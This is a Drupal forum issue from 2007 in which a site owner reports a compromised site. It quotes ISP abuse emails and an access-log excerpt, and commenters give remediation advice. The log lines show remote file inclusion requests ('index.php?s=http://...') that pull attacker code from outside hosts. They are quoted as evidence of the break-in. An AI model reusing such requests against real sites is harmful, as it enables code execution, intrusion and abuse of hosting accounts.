Not sure if this is a Drupal Issue or not, but I did not modify anything with my Drupal Installation yet. Except change some configuration settings.

Somehow that s.php was created. How? I do not know. I am the only one with FTP access to the website. I installed Drupal on May 5th and s.php was created on May 9th. index.php was not modified. s.php is attached to this post.

Excerpts from emails from my ISP (1and1.com):

Received: Tue, 15 May 2007 11:42:43 -0700

Dear **********,

unfortunately we received a large number of complaints concerning Spam-Mails sent through your 1&1 Webspace (contractnumber: ********).
We have to bring to your attention that this kind of mass mailing is illegal and can be prosecuted.
Received: Thu, 17 May 2007 06:17:04 -0700

Dear **********,

We are sorry to tell you, that we have received again a considerable number of complaints about spam sent from your 1&1 Webspace (contract number: ********).

To prevent further abuse your Webspace must be temporarily locked.
Furthermore we would ask you to contact us (abuse@oneandone.net) within two days in order to receive your comment on this concern.
Received: Fri, 18 May 2007 05:56:12 -0700

Dear **********,

it appears that your hosting account has been compromised via an
insecure PHP script. Excerpt from your access log files:

158.170.64.*** - - [08/May/2007:17:56:49 -0400] "GET /index.php?s=http://www.pronext.eu/help/a.txt? HTTP/1.1" 200 5226 www.peanyscafe.com "-" "libwww-perl/5.79" "-"

70.86.59.*** - - [09/May/2007:12:23:46 -0400] "GET
/index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

70.86.59.*** - - [09/May/2007:12:25:33 -0400] "GET
/index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

71.198.125.*** - - [09/May/2007:12:31:18 -0400] "GET
/index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.69" "-"

216.67.224.*** - - [09/May/2007:12:31:43 -0400] "GET /index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

62.240.180.*** - - [09/May/2007:12:33:02 -0400] "GET /index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

217.112.42.*** - - [09/May/2007:12:54:02 -0400] "GET /index.php?s=http://www.pronext.eu/help/a.txt? HTTP/1.1" 200 5226 www.peanyscafe.com "-" "libwww-perl/5.79" "-"

Apparently there's an unsanitized include() statement performed on the
$... variable of your script, which allows attackers to execute arbitrary
PHP code with your user permissions.

We've disabled this script (chmod 000) to prevent further damage.

The following malicious files were apparently created with the help of the exploit:

/s.php
/index.php

These have been disabled as well.

Please update your script to prevent this kind of incident from reoccuring. Thank you for your understanding regarding the measures taken. Please also
check your web space for other unknown files.
CommentFileSizeAuthor
s.php_.txt4.51 KBCPeanutG

Comments

kaerast’s picture

kaerast commented

Security issues should not be discussed as a public issue like this. Can you email security@drupal.org with this information, plus a copy of index.php, version numbers of everything, a list of modules you are running and if possible a copy of your access log for 7th/8th May.

deavidsedice’s picture

deavidsedice commented

Check the permissions in every folder. Remove write permissions for all, except files directory.

A bug, coming from Drupal, or a third module, could let to this spammer write the php file in your directory and execute it.

Try to disable modules that are related to uploads.

bradlis7’s picture

bradlis7 commented
Status: Active » Closed (fixed)

I'm going to assume this has been solved, or is no longer an issue.